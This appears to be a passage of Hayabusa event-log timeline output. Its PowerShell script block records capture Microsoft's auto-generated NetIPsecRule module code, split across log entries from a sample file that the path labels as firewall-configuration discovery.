$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShe,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] 